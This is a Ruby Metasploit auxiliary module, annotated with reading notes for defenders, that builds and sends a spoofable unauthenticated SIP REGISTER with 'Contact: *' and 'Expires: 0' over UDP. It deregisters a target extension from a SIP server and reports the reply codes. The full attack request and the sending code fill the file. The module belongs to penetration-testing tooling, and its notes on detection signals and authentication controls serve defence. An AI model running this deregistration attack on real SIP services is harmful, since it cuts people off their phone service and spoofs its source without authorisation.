rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/voip/sip_deregister.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
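# Auxiliary scanner module that sends one unauthenticated SIP REGISTER with
# "Contact: *" and "Expires: 0" for EXTENSION@DOMAIN to each target host over
# UDP, then reports the status code of whatever comes back.
#
# Reading notes for defenders (all taken from the request built in #run_host):
# - The request carries no Authorization header. The module Description says it
#   was tested against servers that do not use REGISTER authentication, and
#   #parse_reply reports 401/403 replies as failures, so challenging every
#   REGISTER is the control this request does not get past.
# - On the wire the request is a REGISTER with "Contact: *", "Expires: 0",
#   "CSeq: 1 REGISTER", "Max-Forwards: 70", a Call-ID made of a three-digit
#   number followed by the target IP, a Via line holding only SRCADDR, and a
#   From line without a tag parameter. RFC 3261 requires a Via branch and a
#   From tag, so their absence is a usable log/IDS signal.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Scanner

  # Declares the module metadata and its datastore options.
  def initialize
    super(
      'Name' => 'SIP Deregister Extension',
      'Description' => %q{
        This module will attempt to deregister a SIP user from the provider. It
        has been tested successfully when the sip provider/server doesn't use REGISTER
        authentication.
      },
      'Author' => [ 'ChrisJohnRiley' ],
      'License' => MSF_LICENSE,
      # The module declares that a run can cost the target a resource (here: the
      # extension's registration) and that it leaves indicators in logs.
      'Notes' => {
        'Stability' => [SERVICE_RESOURCE_LOSS],
        'SideEffects' => [IOC_IN_LOGS],
        'Reliability' => []
      }
    )

    deregister_udp_options
    register_options(
      [
        Opt::RPORT(5060),
        OptString.new('SRCADDR', [true, 'The sip address the spoofed deregister request is coming from', '192.168.1.1']),
        OptString.new('EXTENSION', [true, 'The specific extension or name to target', '100']),
        OptString.new('DOMAIN', [true, 'Use a specific SIP domain', 'example.com'])
      ]
    )
    register_advanced_options(
      [
        OptAddress.new('SIP_PROXY_NAME', [false, 'Use a specific SIP proxy', nil]),
        OptPort.new('SIP_PROXY_PORT', [false, 'SIP Proxy port to use', 5060])
      ]
    )
  end

  # Rejects option values that would break the header lines built in #run_host.
  #
  # `\s` also matches CR and LF, so this check is what keeps a datastore value
  # from adding extra header lines to the request. SRCADDR is checked as well
  # because it is an OptString that is written verbatim into the Via header;
  # SIP_PROXY_NAME and SIP_PROXY_PORT are typed options (OptAddress/OptPort).
  #
  # NOTE(review): this override does not call `super`; confirm that no
  # included mixin relies on its own #setup running.
  #
  # @raise [ArgumentError] if EXTENSION, DOMAIN or SRCADDR contains whitespace
  def setup
    %w[EXTENSION DOMAIN SRCADDR].each do |name|
      next unless datastore[name].to_s.match?(/\s/)

      raise ArgumentError, "#{name} cannot contain spaces"
    end
  end

  # Sends the REGISTER request to one target and reports every reply received.
  #
  # @param ip [String] target address handed in by the scanner mixin; it is
  #   only used here as part of the Call-ID value
  def run_host(ip)
    src = datastore['SRCADDR']
    ext = datastore['EXTENSION']
    dom = datastore['DOMAIN']
    sphost = datastore['SIP_PROXY_NAME']
    spport = datastore['SIP_PROXY_PORT'] || 5060
    conn_string = "#{ext}@#{dom}"

    # A Route header is only added when a proxy name was configured; `route`
    # stays nil otherwise.
    route = "Route: <sip:#{sphost}:#{spport};lr>\r\n" unless sphost.nil? || sphost.empty?

    connect_udp

    print_status("Sending deregistration packet to: #{conn_string}")
    print_status("Using SIP proxy #{sphost}:#{spport}") if route

    req = "REGISTER sip:#{dom} SIP/2.0\r\n"
    req << route if route
    req << "Via: SIP/2.0/UDP #{src}\r\n"
    req << "Max-Forwards: 70\r\n"
    req << "To: \"#{ext}\"<sip:#{conn_string}>\r\n"
    req << "From: \"#{ext}\"<sip:#{conn_string}>\r\n"
    req << "Call-ID: #{rand(100..199)}#{ip}\r\n"
    req << "CSeq: 1 REGISTER\r\n"
    # "Contact: *" together with "Expires: 0" is the combination that asks the
    # registrar to drop the bindings of the address in the To header.
    req << "Contact: *\r\n"
    req << "Expires: 0\r\n"
    req << "Content-Length: 0\r\n\r\n"

    udp_sock.put(req)
    response = false

    # Keep reading datagrams until recvfrom returns nothing / no peer address.
    # #parse_reply always returns true, so `response` flips to true as soon as
    # a single datagram has been parsed.
    while (r = udp_sock.recvfrom(65535, 3)) && r[1]
      response = parse_reply(r)
    end

    # No reply may be expected when SRCADDR is spoofed.
    print_error('No response received from remote host') unless response
  rescue Errno::EACCES => e
    vprint_error(e.message)
  ensure
    disconnect_udp
  end

  # Reports the outcome carried by one received datagram.
  #
  # The datagram is attacker-controllable input from the operator's point of
  # view (any host can answer on UDP), and the To header value is echoed to
  # the console. It is therefore reduced to printable ASCII first, so a reply
  # cannot place terminal control sequences into console output or logs.
  #
  # @param pkt [Array] value returned by udp_sock.recvfrom; pkt[0] is the
  #   payload text, the remaining elements are not used
  # @return [true] always, so the caller can tell that a reply was seen
  def parse_reply(pkt)
    # Second whitespace-separated token of the payload, i.e. the status code of
    # a "SIP/2.0 <code> <reason>" line. A missing token becomes 0 via nil.to_i
    # and lands in the `else` branch below.
    code = pkt[0].split(/\s+/)[1].to_i

    # `^`/`$` match per line on purpose here: the To header sits somewhere in
    # the middle of the payload. Parameters after ';' are dropped.
    target = ::Regexp.last_match(1).strip.split(';')[0] if pkt[0] =~ /^To:\s*(.*)$/i

    # Neutralise everything outside printable ASCII and give the messages a
    # visible subject when the reply has no (or an empty) To header.
    target = target.to_s.b.gsub(/[^\x20-\x7E]/, '.')
    target = '<no To header>' if target.empty?

    case code
    when 401
      print_error("Unable to de-register #{target} [401 Unauthorised]")
    when 403
      print_error("Unable to de-register #{target} [403 Forbidden]")
    when 200
      print_good("#{target} de-registered [200 OK]")
    else
      print_error("#{target} : Undefined error code #{code}")
    end

    true
  end
end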